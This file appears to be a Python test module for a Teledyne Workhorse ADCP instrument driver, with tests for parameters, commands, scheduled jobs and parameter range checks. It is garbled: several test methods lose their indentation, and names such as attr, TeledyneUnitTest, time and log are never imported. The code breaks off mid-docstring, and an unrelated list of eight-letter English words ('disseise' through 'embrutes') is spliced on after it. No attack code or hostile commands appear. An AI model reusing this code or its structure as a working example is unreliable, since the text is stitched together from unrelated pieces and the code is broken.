from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import WorkhorseParameter
from mi.instrument.teledyne.driver import TeledyneScheduledJob
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import TeledynePrompt
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import NEWLINE
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import ADCP_SYSTEM_CONFIGURATION_KEY
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import ADCP_SYSTEM_CONFIGURATION_DataParticle
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import ADCP_COMPASS_CALIBRATION_KEY
from mi.instrument.teledyne.workhorse_monitor_75_khz.driver import ADCP_COMPASS_CALIBRATION_DataParticle
#from mi.instrument.teledyne.workhorse_monitor_75_khz.test.test_data import PS3_RAW_DATA
#from mi.instrument.teledyne.workhorse_monitor_75_khz.test.test_data import FD_RAW_DATA
#from mi.instrument.teledyne.workhorse_monitor_75_khz.test.test_data import PT200_RAW_DATA
from mi.core.exceptions import InstrumentParameterException
from mi.core.exceptions import InstrumentStateException
from mi.core.exceptions import InstrumentCommandException
from pyon.core.exception import Conflict
from pyon.agent.agent import ResourceAgentEvent
from mi.core.instrument.instrument_driver import DriverConnectionState
from mi.core.instrument.instrument_driver import DriverProtocolState
from mi.core.instrument.instrument_driver import ResourceAgentState
from random import randint
from mi.idk.unit_test import AGENT_DISCOVER_TIMEOUT
from mi.idk.unit_test import GO_ACTIVE_TIMEOUT
from mi.idk.unit_test import GET_TIMEOUT
from mi.idk.unit_test import SET_TIMEOUT
from mi.idk.unit_test import EXECUTE_TIMEOUT
#################################### RULES ####################################
# #
# Common capabilities in the base class #
# #
# Instrument specific stuff in the derived class #
# #
# Generator spits out either stubs or comments describing test this here, #
# test that there. #
# #
# Qualification tests are driven through the instrument_agent #
# #
###############################################################################
class WorkhorseParameterAltValue():
    """Alternate, valid-but-non-default parameter values.

    Used by the set tests to verify that good values can be written and
    are later blown away by a driver re-init.
    """
    # Probably best NOT to tweak this one.
    SERIAL_FLOW_CONTROL = '11110'
    BANNER = 1
    SAVE_NVRAM_TO_RECORDER = True  # Immutable.
    SLEEP_ENABLE = 1
    POLLED_MODE = True
    PITCH = 1
    ROLL = 1

    @classmethod
    def dict(cls):
        """Return {attribute_name: value} for the public class attributes.

        Mirrors the BaseEnum.dict() interface that test_startup_params relies
        on (the plain class previously had no dict() and the call raised
        AttributeError).
        """
        result = {}
        for key, value in vars(cls).items():
            # Skip dunders/privates and this classmethod itself.
            if key.startswith('_') or callable(getattr(cls, key)):
                continue
            result[key] = value
        return result
###############################################################################
# UNIT TESTS #
###############################################################################
@attr('UNIT', group='mi')
class WorkhorseDriverUnitTest(TeledyneUnitTest):
    """Unit tests for the 75 kHz Workhorse driver.

    All common unit-test capabilities live in TeledyneUnitTest; this class
    only wires up the shared fixture.
    """
    def setUp(self):
        # Delegate to the shared Teledyne unit-test fixture setup.
        TeledyneUnitTest.setUp(self)
###############################################################################
# INTEGRATION TESTS #
###############################################################################
@attr('INT', group='mi')
class WorkhorseDriverIntegrationTest(TeledyneIntegrationTest):
def setUp(self):
    """Delegate to the shared Teledyne integration-test fixture setup."""
    TeledyneIntegrationTest.setUp(self)
    # Dead code removed: a stringified (and therefore never-executed) loop
    # that seeded self._driver_parameter_defaults from the writable VALUE
    # entries of self._driver_parameters. Re-add deliberately if per-test
    # defaults are ever needed again.
###
# Add instrument specific integration tests
###
def test_parameters(self):
    """
    Verify driver parameters and their types.

    Startup parameters are additionally checked against their expected
    values, confirming that parameters are read/converted properly and
    that the startup configuration has been applied.
    """
    self.assert_initialize_driver()
    resource_params = self.driver_client.cmd_dvr('get_resource', WorkhorseParameter.ALL)
    self.assert_driver_parameters(resource_params, True)
def test_commands(self):
    """
    Run instrument commands from both command and streaming mode.

    In command mode every protocol event should succeed; in autosample
    (streaming) mode the non-streamable commands must raise
    InstrumentCommandException instead.
    """
    self.assert_initialize_driver()
    ####
    # First test in command mode
    ####
    self.assert_driver_command(TeledyneProtocolEvent.START_AUTOSAMPLE, state=TeledyneProtocolState.AUTOSAMPLE, delay=1)
    self.assert_driver_command(TeledyneProtocolEvent.STOP_AUTOSAMPLE, state=TeledyneProtocolState.COMMAND, delay=1)
    self.assert_driver_command(TeledyneProtocolEvent.GET_CALIBRATION)
    self.assert_driver_command(TeledyneProtocolEvent.GET_CONFIGURATION)
    self.assert_driver_command(TeledyneProtocolEvent.CLOCK_SYNC)
    self.assert_driver_command(TeledyneProtocolEvent.SCHEDULED_CLOCK_SYNC)
    # Ensemble records start with the 0x7f7f header bytes.
    self.assert_driver_command(TeledyneProtocolEvent.SEND_LAST_SAMPLE, regex='^\x7f\x7f.*')
    self.assert_driver_command(TeledyneProtocolEvent.SAVE_SETUP_TO_RAM, expected="Parameters saved as USER defaults")
    self.assert_driver_command(TeledyneProtocolEvent.GET_ERROR_STATUS_WORD, regex='^........')
    self.assert_driver_command(TeledyneProtocolEvent.CLEAR_ERROR_STATUS_WORD, regex='^Error Status Word Cleared')
    self.assert_driver_command(TeledyneProtocolEvent.GET_FAULT_LOG, regex='^Total Unique Faults =.*')
    self.assert_driver_command(TeledyneProtocolEvent.CLEAR_FAULT_LOG, expected='FC ..........\r\n Fault Log Cleared.\r\nClearing buffer @0x00801000\r\nDone [i=2048].\r\n')
    self.assert_driver_command(TeledyneProtocolEvent.GET_INSTRUMENT_TRANSFORM_MATRIX, regex='^Beam Width:')
    self.assert_driver_command(TeledyneProtocolEvent.RUN_TEST_200, regex='^  Ambient  Temperature =')
    ####
    # Test in streaming mode
    ####
    # Put us in streaming
    self.assert_driver_command(TeledyneProtocolEvent.START_AUTOSAMPLE, state=TeledyneProtocolState.AUTOSAMPLE, delay=1)
    # These commands are command-mode only and must be rejected while streaming.
    self.assert_driver_command_exception(TeledyneProtocolEvent.SEND_LAST_SAMPLE, exception_class=InstrumentCommandException)
    self.assert_driver_command_exception(TeledyneProtocolEvent.SAVE_SETUP_TO_RAM, exception_class=InstrumentCommandException)
    self.assert_driver_command_exception(TeledyneProtocolEvent.GET_ERROR_STATUS_WORD, exception_class=InstrumentCommandException)
    self.assert_driver_command_exception(TeledyneProtocolEvent.CLEAR_ERROR_STATUS_WORD, exception_class=InstrumentCommandException)
    self.assert_driver_command_exception(TeledyneProtocolEvent.GET_FAULT_LOG, exception_class=InstrumentCommandException)
    self.assert_driver_command_exception(TeledyneProtocolEvent.CLEAR_FAULT_LOG, exception_class=InstrumentCommandException)
    self.assert_driver_command_exception(TeledyneProtocolEvent.GET_INSTRUMENT_TRANSFORM_MATRIX, exception_class=InstrumentCommandException)
    self.assert_driver_command_exception(TeledyneProtocolEvent.RUN_TEST_200, exception_class=InstrumentCommandException)
    # The scheduled variant is allowed while streaming; the direct one is not.
    self.assert_driver_command(TeledyneProtocolEvent.SCHEDULED_CLOCK_SYNC)
    self.assert_driver_command_exception(TeledyneProtocolEvent.CLOCK_SYNC, exception_class=InstrumentCommandException)
    self.assert_driver_command(TeledyneProtocolEvent.GET_CALIBRATION, regex=r'Calibration date and time:')
    self.assert_driver_command(TeledyneProtocolEvent.GET_CONFIGURATION, regex=r' Instrument S/N')
    self.assert_driver_command(TeledyneProtocolEvent.STOP_AUTOSAMPLE, state=TeledyneProtocolState.COMMAND, delay=1)
    ####
    # Test a bad command
    ####
    self.assert_driver_command_exception('ima_bad_command', exception_class=InstrumentCommandException)
def test_startup_params(self):
    """
    Verify that startup parameters are applied correctly. Generally this
    happens in the driver discovery method.

    since nose orders the tests by ascii value this should run first.
    """
    self.assert_initialize_driver()
    # Expected post-discovery values for every startup parameter.
    get_values = {
        WorkhorseParameter.SERIAL_FLOW_CONTROL: '11110',
        WorkhorseParameter.BANNER: False,
        WorkhorseParameter.INSTRUMENT_ID: 0,
        WorkhorseParameter.SLEEP_ENABLE: 0,
        WorkhorseParameter.SAVE_NVRAM_TO_RECORDER: True,
        WorkhorseParameter.POLLED_MODE: False,
        WorkhorseParameter.XMIT_POWER: 255,
        WorkhorseParameter.SPEED_OF_SOUND: 1485,
        WorkhorseParameter.PITCH: 0,
        WorkhorseParameter.ROLL: 0,
        WorkhorseParameter.SALINITY: 35,
        WorkhorseParameter.TIME_PER_ENSEMBLE: '00:00:00.00',
        WorkhorseParameter.TIME_PER_PING: '00:01.00',
        WorkhorseParameter.FALSE_TARGET_THRESHOLD: '050,001',
        WorkhorseParameter.BANDWIDTH_CONTROL: 0,
        WorkhorseParameter.CORRELATION_THRESHOLD: 64,
        WorkhorseParameter.SERIAL_OUT_FW_SWITCHES: '111100000',
        WorkhorseParameter.ERROR_VELOCITY_THRESHOLD: 2000,
        WorkhorseParameter.BLANK_AFTER_TRANSMIT: 704,
        WorkhorseParameter.CLIP_DATA_PAST_BOTTOM: 0,
        WorkhorseParameter.RECEIVER_GAIN_SELECT: 1,
        WorkhorseParameter.WATER_REFERENCE_LAYER: '001,005',
        WorkhorseParameter.WATER_PROFILING_MODE: 1,
        WorkhorseParameter.NUMBER_OF_DEPTH_CELLS: 100,
        WorkhorseParameter.PINGS_PER_ENSEMBLE: 1,
        WorkhorseParameter.DEPTH_CELL_SIZE: 800,
        WorkhorseParameter.TRANSMIT_LENGTH: 0,
        WorkhorseParameter.PING_WEIGHT: 0,
        WorkhorseParameter.AMBIGUITY_VELOCITY: 175,
    }
    # Change the values of these parameters to something before the
    # driver is reinitialized.  They should be blown away on reinit.
    new_values = {}
    p = WorkhorseParameter.dict()
    # NOTE(review): WorkhorseParameterAltValue is declared in this module as a
    # plain class; it must expose a BaseEnum-style dict() classmethod for this
    # call to work — confirm.
    for k, v in WorkhorseParameterAltValue.dict().items():
        # Skip the read-only / immutable parameters.
        if k not in ('BANNER', 'SERIAL_FLOW_CONTROL', 'SAVE_NVRAM_TO_RECORDER'):
            new_values[p[k]] = v
    self.assert_startup_parameters(self.assert_driver_parameters, new_values, get_values)
###
# Test scheduled events
###
def assert_compass_calibration(self):
    """
    Verify a compass calibration particle was generated asynchronously.
    """
    self.clear_events()
    self.assert_async_particle_generation(DataParticleType.ADCP_COMPASS_CALIBRATION, self.assert_particle_compass_calibration, timeout=120)

def test_scheduled_compass_calibration_command(self):
    """
    Verify the get-calibration job can be scheduled and runs while the
    driver stays in COMMAND state.
    """
    self.assert_scheduled_event(TeledyneScheduledJob.GET_CALIBRATION, self.assert_compass_calibration, delay=100)
    self.assert_current_state(TeledyneProtocolState.COMMAND)

def test_scheduled_compass_calibration_autosample(self):
    """
    Verify the get-calibration job can be scheduled and runs while the
    driver is in AUTOSAMPLE state.
    """
    self.assert_scheduled_event(TeledyneScheduledJob.GET_CALIBRATION, self.assert_compass_calibration, delay=100,
                                autosample_command=TeledyneProtocolEvent.START_AUTOSAMPLE)
    self.assert_current_state(TeledyneProtocolState.AUTOSAMPLE)
    self.assert_driver_command(TeledyneProtocolEvent.STOP_AUTOSAMPLE)

def assert_acquire_status(self):
    """
    Verify a system-configuration (status) particle was generated asynchronously.
    """
    self.clear_events()
    self.assert_async_particle_generation(DataParticleType.ADCP_SYSTEM_CONFIGURATION, self.assert_particle_system_configuration, timeout=120)

def test_scheduled_device_configuration_command(self):
    """
    Verify the get-configuration job can be scheduled and runs while the
    driver stays in COMMAND state.
    """
    self.assert_scheduled_event(TeledyneScheduledJob.GET_CONFIGURATION, self.assert_acquire_status, delay=100)
    self.assert_current_state(TeledyneProtocolState.COMMAND)

def test_scheduled_device_configuration_autosample(self):
    """
    Verify the get-configuration job can be scheduled and runs while the
    driver is in AUTOSAMPLE state.
    """
    self.assert_scheduled_event(TeledyneScheduledJob.GET_CONFIGURATION, self.assert_acquire_status,
                                autosample_command=TeledyneProtocolEvent.START_AUTOSAMPLE, delay=100)
    self.assert_current_state(TeledyneProtocolState.AUTOSAMPLE)
    # Give the scheduled job a moment to fire before leaving autosample.
    time.sleep(5)
    self.assert_driver_command(TeledyneProtocolEvent.STOP_AUTOSAMPLE)
def assert_clock_sync(self):
    """
    Verify the instrument clock was synchronized: the current UTC time,
    truncated to the hour ("YYYY/MM/DD,HH"), must appear in the
    instrument's TIME parameter.
    """
    # Renamed from `dt`: the old local shadowed the module-level
    # `import datetime as dt` alias.
    instrument_time = self.assert_get(WorkhorseParameter.TIME)
    # Local time -> epoch -> UTC string, matching the instrument's format.
    utc_now = time.strftime("%Y/%m/%d,%H:%M:%S", time.gmtime(time.mktime(time.localtime())))
    # Compare only through the hour field to tolerate set/readback lag.
    self.assertTrue(utc_now[:13].upper() in instrument_time.upper())
def test_scheduled_clock_sync_command(self):
    """
    Verify the scheduled clock sync is triggered and functions as expected
    while the driver stays in COMMAND state.
    """
    self.assert_scheduled_event(TeledyneScheduledJob.CLOCK_SYNC, self.assert_clock_sync, delay=90)
    self.assert_current_state(TeledyneProtocolState.COMMAND)

def test_scheduled_clock_sync_autosample(self):
    """
    Verify the scheduled clock sync is triggered and functions as expected
    while the driver is in AUTOSAMPLE state.
    """
    self.assert_scheduled_event(TeledyneScheduledJob.CLOCK_SYNC, self.assert_clock_sync,
                                autosample_command=TeledyneProtocolEvent.START_AUTOSAMPLE, delay=200)
    self.assert_current_state(TeledyneProtocolState.AUTOSAMPLE)
    self.assert_driver_command(TeledyneProtocolEvent.STOP_AUTOSAMPLE)

def _test_set_serial_flow_control_readonly(self):
    """
    Verify SERIAL_FLOW_CONTROL is read-only: setting it must raise.

    NOTE(review): the leading underscore keeps this out of the normal test
    collection — presumably disabled deliberately; confirm before renaming.
    """
    ###
    # test get set of a variety of parameter ranges
    ###
    log.debug("====== Testing ranges for SERIAL_FLOW_CONTROL ======")
    # Test read only raise exceptions on set.
    self.assert_set_exception(WorkhorseParameter.SERIAL_FLOW_CONTROL, '10110')
    self._tested[WorkhorseParameter.SERIAL_FLOW_CONTROL] = True

def _test_set_save_nvram_to_recorder_readonly(self):
    """
    Verify SAVE_NVRAM_TO_RECORDER is read-only: setting it must raise.
    (Underscore-prefixed: not auto-collected — see note above.)
    """
    ###
    # test get set of a variety of parameter ranges
    ###
    log.debug("====== Testing ranges for SAVE_NVRAM_TO_RECORDER ======")
    # Test read only raise exceptions on set.
    self.assert_set_exception(WorkhorseParameter.SAVE_NVRAM_TO_RECORDER, False)
    self._tested[WorkhorseParameter.SAVE_NVRAM_TO_RECORDER] = True

def _test_set_banner_readonly(self):
    """
    Verify BANNER is read-only: setting it must raise.
    (Underscore-prefixed: not auto-collected — see note above.)
    """
    ###
    # test get set of a variety of parameter ranges
    ###
    log.debug("====== Testing ranges for BANNER ======")
    # Test read only raise exceptions on set.
    self.assert_set_exception(WorkhorseParameter.BANNER, True)
    self._tested[WorkhorseParameter.BANNER] = True
def _test_set_pitch(self):
    """
    Exercise PITCH across its valid range and verify invalid values raise.
    (Underscore-prefixed: not auto-collected by the test runner — presumably
    disabled deliberately; confirm before renaming.)
    """
    ###
    # test get set of a variety of parameter ranges
    ###
    log.debug("====== Testing ranges for PITCH ======")
    # PITCH:  -- Int -6000 to 6000
    self.assert_set(WorkhorseParameter.PITCH, -6000)
    self.assert_set(WorkhorseParameter.PITCH, -4000)
    self.assert_set(WorkhorseParameter.PITCH, -2000)
    self.assert_set(WorkhorseParameter.PITCH, -1)
    self.assert_set(WorkhorseParameter.PITCH, 0)
    self.assert_set(WorkhorseParameter.PITCH, 1)
    self.assert_set(WorkhorseParameter.PITCH, 2000)
    self.assert_set(WorkhorseParameter.PITCH, 4000)
    self.assert_set(WorkhorseParameter.PITCH, 6000)
    # Out-of-range and wrong-type values must be rejected.
    self.assert_set_exception(WorkhorseParameter.PITCH, "LEROY JENKINS")
    self.assert_set_exception(WorkhorseParameter.PITCH, -6001)
    self.assert_set_exception(WorkhorseParameter.PITCH, 6001)
    self.assert_set_exception(WorkhorseParameter.PITCH, 3.1415926)
    #
    # Reset to good value.
    #
    #self.assert_set(WorkhorseParameter.PITCH, self._driver_parameter_defaults[WorkhorseParameter.PITCH])
    self.assert_set(WorkhorseParameter.PITCH, self._driver_parameters[WorkhorseParameter.PITCH][self.VALUE])
    self._tested[WorkhorseParameter.PITCH] = True

def _test_set_roll(self):
    """
    Exercise ROLL across its valid range and verify invalid values raise.
    (Underscore-prefixed: not auto-collected — see note above.)
    """
    ###
    # test get set of a variety of parameter ranges
    ###
    log.debug("====== Testing ranges for ROLL ======")
    # ROLL:  -- Int -6000 to 6000
    self.assert_set(WorkhorseParameter.ROLL, -6000)
    self.assert_set(WorkhorseParameter.ROLL, -4000)
    self.assert_set(WorkhorseParameter.ROLL, -2000)
    self.assert_set(WorkhorseParameter.ROLL, -1)
    self.assert_set(WorkhorseParameter.ROLL, 0)
    self.assert_set(WorkhorseParameter.ROLL, 1)
    self.assert_set(WorkhorseParameter.ROLL, 2000)
    self.assert_set(WorkhorseParameter.ROLL, 4000)
    self.assert_set(WorkhorseParameter.ROLL, 6000)
    # Out-of-range and wrong-type values must be rejected.
    self.assert_set_exception(WorkhorseParameter.ROLL, "LEROY JENKINS")
    self.assert_set_exception(WorkhorseParameter.ROLL, -6001)
    self.assert_set_exception(WorkhorseParameter.ROLL, 6001)
    self.assert_set_exception(WorkhorseParameter.ROLL, 3.1415926)
    #
    # Reset to good value.
    #
    #self.assert_set(WorkhorseParameter.ROLL, self._driver_parameter_defaults[WorkhorseParameter.ROLL])
    self.assert_set(WorkhorseParameter.ROLL, self._driver_parameters[WorkhorseParameter.ROLL][self.VALUE])
    self._tested[WorkhorseParameter.ROLL] = True

def _test_set_polled_mode(self):
    """
    Exercise POLLED_MODE (boolean) and verify invalid values raise.
    (Underscore-prefixed: not auto-collected — see note above.)
    """
    ###
    # test get set of a variety of parameter ranges
    ###
    log.debug("====== Testing ranges for POLLED_MODE ======")
    # POLLED_MODE:  -- (True/False)
    self.assert_set(WorkhorseParameter.POLLED_MODE, True)
    self.assert_set_exception(WorkhorseParameter.POLLED_MODE, "LEROY JENKINS")
    #
    # Reset to good value.
    #
    #self.assert_set(WorkhorseParameter.POLLED_MODE, self._driver_parameter_defaults[WorkhorseParameter.POLLED_MODE])
    self.assert_set(WorkhorseParameter.POLLED_MODE, self._driver_parameters[WorkhorseParameter.POLLED_MODE][self.VALUE])
    self._tested[WorkhorseParameter.POLLED_MODE] = True
def _test_set_sleep_enable(self):
###
# test get set of a variety of parameter ranges
###
log.debug("====== Testing ranges for SLEEP_ENABLE ======")
# SLEEP_ENABLE: -- (0,1,2)
self.assert_set(WorkhorseParameter.SLEEP_ENABLE, 1)
self.assert_set(WorkhorseParameter.SLEEP_ENABLE, 2)
self.assert_set_exception(WorkhorseParameter.SLEEP_ENABLE, -1)
self.assert_set_exception(WorkhorseParameter.SLEEP_ENABLE, 3)
self.assert_set_exception(WorkhorseParameter.SLEEP_ENABLE, 3.1415926)
self.assert_set_exception(WorkhorseParameter.SLEEP_ENABLE, "LEROY JENKINS")
#
# Reset to good value.
#
#self.assert_set(WorkhorseParameter.SLEEP_ENABLE, self._driver_parameter_defaults[WorkhorseParameter.SLEEP_ENABLE])
self.assert_set(WorkhorseParameter.SLEEP_ENABLE, self._driver_parameters[WorkhorseParameter.SLEEP_ENABLE][self.VALUE])
self._tested[WorkhorseParameter.SLEEP_ENABLE] = True
def _test_set_coordinate_transformation(self):
###
# test get set of a variety of parameter ranges
###
log.debug("====== Testing ranges for COORDINATE_TRANSFORMATION ======")
# COORDINATE_TRANSFORMATION: -- (5 bits 0 or 1)
self.assert_set(WorkhorseParameter.COORDINATE_TRANSFORMATION, '11000')
self.assert_set(WorkhorseParameter.COORDINATE_TRANSFORMATION, '11111')
self.assert_set(WorkhorseParameter.COORDINATE_TRANSFORMATION, '11101')
self.assert_set(WorkhorseParameter.COORDINATE_TRANSFORMATION, '00000')
self.assert_set(WorkhorseParameter.COORDINATE_TRANSFORMATION, '00111')
self.assert_set(WorkhorseParameter.COORDINATE_TRANSFORMATION, '00101')
self.assert_set_exception(WorkhorseParameter.COORDINATE_TRANSFORMATION, -1)
self.assert_set_exception(WorkhorseParameter.COORDINATE_TRANSFORMATION, 3)
self.assert_set_exception(WorkhorseParameter.COORDINATE_TRANSFORMATION, 3.1415926)
self.assert_set_exception(WorkhorseParameter.COORDINATE_TRANSFORMATION, "LEROY JENKINS")
#
# Reset to good value.
#
#self.assert_set(WorkhorseParameter.COORDINATE_TRANSFORMATION, self._driver_parameter_defaults[WorkhorseParameter.COORDINATE_TRANSFORMATION])
self.assert_set(WorkhorseParameter.COORDINATE_TRANSFORMATION, self._driver_parameters[WorkhorseParameter.COORDINATE_TRANSFORMATION][self.VALUE])
self._tested[WorkhorseParameter.COORDINATE_TRANSFORMATION] = True
###############################################################################
# QUALIFICATION TESTS #
# Device specific qualification tests are for doing final testing of ion #
# integration. The generally aren't used for instrument debugging and should #
# be tackled after all unit and integration tests are complete #
###############################################################################
@attr('QUAL', group='mi')
class WorkhorseDriverQualificationTest(TeledyneQualificationTest):
    def setUp(self):
        # Delegate to the shared Teledyne qualification-test fixture setup.
        TeledyneQualificationTest.setUp(self)
    def assert_configuration(self, data_particle, verify_values = False):
        '''
        Verify an ADCP_SYSTEM_CONFIGURATION particle.
        (Docstring previously described the compass-calibration particle;
        the assertions below check system-configuration keys and header.)
        @param data_particle: ADCP_SYSTEM_CONFIGURATION data particle
        @param verify_values: bool, should we verify parameter values
        '''
        self.assert_data_particle_keys(ADCP_SYSTEM_CONFIGURATION_KEY, self._system_configuration_data_parameters)
        self.assert_data_particle_header(data_particle, DataParticleType.ADCP_SYSTEM_CONFIGURATION)
        self.assert_data_particle_parameters(data_particle, self._system_configuration_data_parameters, verify_values)
def assert_compass_calibration(self, data_particle, verify_values = False):
'''
Verify assert_compass_calibration particle
@param data_particle: ADCP_COMPASS_CALIBRATION data particle
@param verify_values: bool, | |
"disseise",
"disseize",
"dissents",
"disserts",
"disserve",
"dissever",
"distaffs",
"distains",
"distally",
"distaves",
"distends",
"distichs",
"distills",
"distomes",
"distrain",
"distrait",
"disulfid",
"disunion",
"disunite",
"disunity",
"disusing",
"disvalue",
"disyoked",
"disyokes",
"ditchers",
"ditheism",
"ditheist",
"dithered",
"ditherer",
"ditsiest",
"dittoing",
"ditziest",
"diureses",
"diuresis",
"diurnals",
"divagate",
"divebomb",
"dividual",
"diviners",
"divinest",
"divinise",
"divinize",
"divorcee",
"divorcer",
"divulger",
"divulges",
"divulsed",
"divulses",
"divvying",
"dizening",
"dizygous",
"dizziest",
"djellaba",
"doblones",
"docilely",
"docility",
"dockages",
"dockhand",
"dockland",
"doctorly",
"doddered",
"dodderer",
"dodgiest",
"dodoisms",
"doeskins",
"dogbanes",
"dogberry",
"dogcarts",
"dogeared",
"dogedoms",
"dogeship",
"dogfaces",
"doggedly",
"doggerel",
"doggiest",
"doggoned",
"doggoner",
"doggones",
"doggrels",
"dognaped",
"dognaper",
"dogsbody",
"dogsleds",
"dogteeth",
"dogtooth",
"dogtrots",
"dogvanes",
"dogwatch",
"dogwoods",
"dolcetto",
"dolerite",
"dolesome",
"dolloped",
"dollying",
"dolmades",
"dolmenic",
"doloroso",
"dolorous",
"domelike",
"domicils",
"domineer",
"dominies",
"dominium",
"donative",
"donators",
"doneness",
"dongolas",
"donnered",
"donniker",
"doodlers",
"doodling",
"doofuses",
"doomiest",
"doomster",
"doorjamb",
"doorless",
"doornail",
"doorpost",
"doorsill",
"doorstop",
"dooryard",
"dopehead",
"dopester",
"dopiness",
"dorhawks",
"dorkiest",
"dormered",
"dormient",
"dormouse",
"dornecks",
"dornicks",
"dornocks",
"dorsally",
"dosseret",
"dotardly",
"dotation",
"dotingly",
"dotterel",
"dottiest",
"dottrels",
"doublers",
"doublets",
"doubloon",
"doublure",
"douceurs",
"douching",
"doughier",
"doupioni",
"dourines",
"dourness",
"douzeper",
"dovecote",
"dovecots",
"dovekeys",
"dovekies",
"dovelike",
"dovening",
"dowagers",
"dowdiest",
"dowdyish",
"doweling",
"dowelled",
"doweries",
"dowering",
"downbows",
"downcome",
"downhaul",
"downiest",
"downland",
"downless",
"downlike",
"downpipe",
"downspin",
"downtick",
"downtrod",
"downwash",
"downzone",
"dowsabel",
"doxology",
"doyennes",
"dozening",
"dozenths",
"doziness",
"drabbest",
"drabbets",
"drabbing",
"drabbled",
"drabbles",
"drabness",
"dracaena",
"dracenas",
"drachmae",
"drachmai",
"draconic",
"draffier",
"draffish",
"draftees",
"draftier",
"draftily",
"draggers",
"draggier",
"draggled",
"draggles",
"dragline",
"dragnets",
"dragoman",
"dragomen",
"dragonet",
"dragrope",
"drainers",
"dramming",
"drammock",
"dramshop",
"drapable",
"dratting",
"draughty",
"drawbars",
"drawbore",
"drawlers",
"drawlier",
"drawling",
"drawtube",
"drayages",
"dreamful",
"dreamier",
"dreamily",
"drearier",
"drearies",
"drearily",
"dredgers",
"dreggier",
"dreggish",
"dreidels",
"drencher",
"drenches",
"dressier",
"dressily",
"dribbing",
"dribbled",
"dribbler",
"dribbles",
"dribblet",
"driblets",
"driftage",
"driftier",
"driftpin",
"dripless",
"drippers",
"drippier",
"drippily",
"drivable",
"driveled",
"driveler",
"drivings",
"drizzles",
"drollery",
"drollest",
"drolling",
"dromonds",
"droolier",
"droopier",
"droopily",
"drophead",
"droppers",
"dropshot",
"dropsied",
"dropsies",
"dropwort",
"droseras",
"droskies",
"drossier",
"droughty",
"drouking",
"drownded",
"drowners",
"drowsier",
"drowsily",
"drowsing",
"drubbers",
"drubbing",
"drudgers",
"drudging",
"druggets",
"druggier",
"druggies",
"drugging",
"druggist",
"druidess",
"druidism",
"drumbled",
"drumbles",
"drumfire",
"drumfish",
"drumhead",
"drumlier",
"drumlike",
"drumlins",
"drumroll",
"drunkest",
"drupelet",
"druthers",
"drypoint",
"drystone",
"drywalls",
"drywells",
"dualisms",
"dualists",
"dualized",
"dualizes",
"dubbings",
"dubniums",
"dubonnet",
"duckbill",
"duckiest",
"duckpins",
"ducktail",
"duckwalk",
"duckweed",
"ductings",
"ductless",
"ductules",
"dudgeons",
"dudishly",
"duecento",
"duelists",
"duellers",
"duelling",
"duellist",
"duetting",
"duettist",
"dukedoms",
"dulcetly",
"dulciana",
"dulcinea",
"dullards",
"dumbcane",
"dumbhead",
"dumbness",
"dumfound",
"dummkopf",
"dummying",
"dumpcart",
"dumpiest",
"dumpings",
"dumpsite",
"duncical",
"duneland",
"dunelike",
"dungaree",
"dunghill",
"dungiest",
"dunnages",
"dunnites",
"duologue",
"duopsony",
"duotones",
"duperies",
"duplexed",
"duplexer",
"duramens",
"durances",
"durative",
"duresses",
"durmasts",
"durndest",
"durneder",
"duskiest",
"dustbins",
"dustheap",
"dustiest",
"dustings",
"dustless",
"dustlike",
"dustoffs",
"dustpans",
"dustrags",
"dutiable",
"duumviri",
"duumvirs",
"duvetine",
"duvetyne",
"duvetyns",
"duxelles",
"dwarfest",
"dwarfing",
"dwarfish",
"dwarfism",
"dweebier",
"dweebish",
"dwindles",
"dyarchic",
"dybbukim",
"dyestuff",
"dyeweeds",
"dyewoods",
"dynamist",
"dynatron",
"dysgenic",
"dyspepsy",
"dyspneal",
"dyspneas",
"dyspneic",
"dyspnoea",
"dyspnoic",
"dystaxia",
"dystocia",
"dystonic",
"dysurias",
"eagerest",
"eanlings",
"earaches",
"eardrops",
"eardrums",
"earflaps",
"earldoms",
"earlobes",
"earlocks",
"earlship",
"earmuffs",
"earnests",
"earshots",
"earstone",
"earthier",
"earthily",
"earthman",
"earthmen",
"earthnut",
"earthpea",
"earthset",
"earwaxes",
"earworms",
"eastings",
"eatables",
"ebonised",
"ebonises",
"ebonites",
"ebonized",
"ebonizes",
"ecaudate",
"ecbolics",
"ecdysial",
"ecdysone",
"ecdysons",
"ecesises",
"echelles",
"echidnae",
"echidnas",
"echinate",
"echinoid",
"echogram",
"echoisms",
"echoless",
"eclipser",
"eclipsis",
"eclogite",
"eclogues",
"eclosion",
"ecocidal",
"ecocides",
"ecofreak",
"econobox",
"ecotages",
"ecotonal",
"ecotones",
"ecotours",
"ecotypes",
"ecotypic",
"ecraseur",
"ectoderm",
"ectomere",
"ectopias",
"ectosarc",
"ectozoan",
"ectozoon",
"ecumenic",
"edacious",
"edentate",
"edgeless",
"edgeways",
"edgewise",
"edginess",
"edifices",
"edifiers",
"editress",
"educable",
"educible",
"eductive",
"eductors",
"eelgrass",
"eelpouts",
"eelworms",
"eeriness",
"effacers",
"effacing",
"effecter",
"effendis",
"effetely",
"effigial",
"effigies",
"effluvia",
"effluxes",
"effulged",
"effulges",
"effusing",
"effusive",
"eftsoons",
"egalites",
"egesting",
"egestion",
"egestive",
"eggfruit",
"eggheads",
"eglatere",
"eglomise",
"egoistic",
"egomania",
"egotisms",
"egotists",
"egressed",
"egresses",
"eidolons",
"eighthly",
"eightvos",
"einkorns",
"eisweins",
"ejective",
"ejectors",
"ekistics",
"ekpweles",
"ektexine",
"elaphine",
"elapsing",
"elastins",
"elatedly",
"elaterid",
"elaterin",
"elations",
"elatives",
"elbowing",
"electees",
"electros",
"electrum",
"elegancy",
"elegiacs",
"elegised",
"elegises",
"elegists",
"elegized",
"elegizes",
"elenchic",
"elenchus",
"elenctic",
"elfishly",
"elflocks",
"elicitor",
"elidible",
"eligibly",
"elisions",
"elitisms",
"elkhound",
"eloigned",
"eloigner",
"eloiners",
"eloining",
"elusions",
"elutions",
"eluviate",
"eluviums",
"elvishly",
"elytroid",
"elytrous",
"emaciate",
"emanator",
"embalmed",
"embalmer",
"embanked",
"embarred",
"embattle",
"embaying",
"embezzle",
"embitter",
"emblazed",
"emblazer",
"emblazes",
"emblazon",
"emblemed",
"embodier",
"embolden",
"embolies",
"emborder",
"embosked",
"embosoms",
"embosser",
"embosses",
"embowels",
"embowers",
"embowing",
"embracer",
"embroils",
"embrowns",
"embruing",
"embruted",
"embrutes",
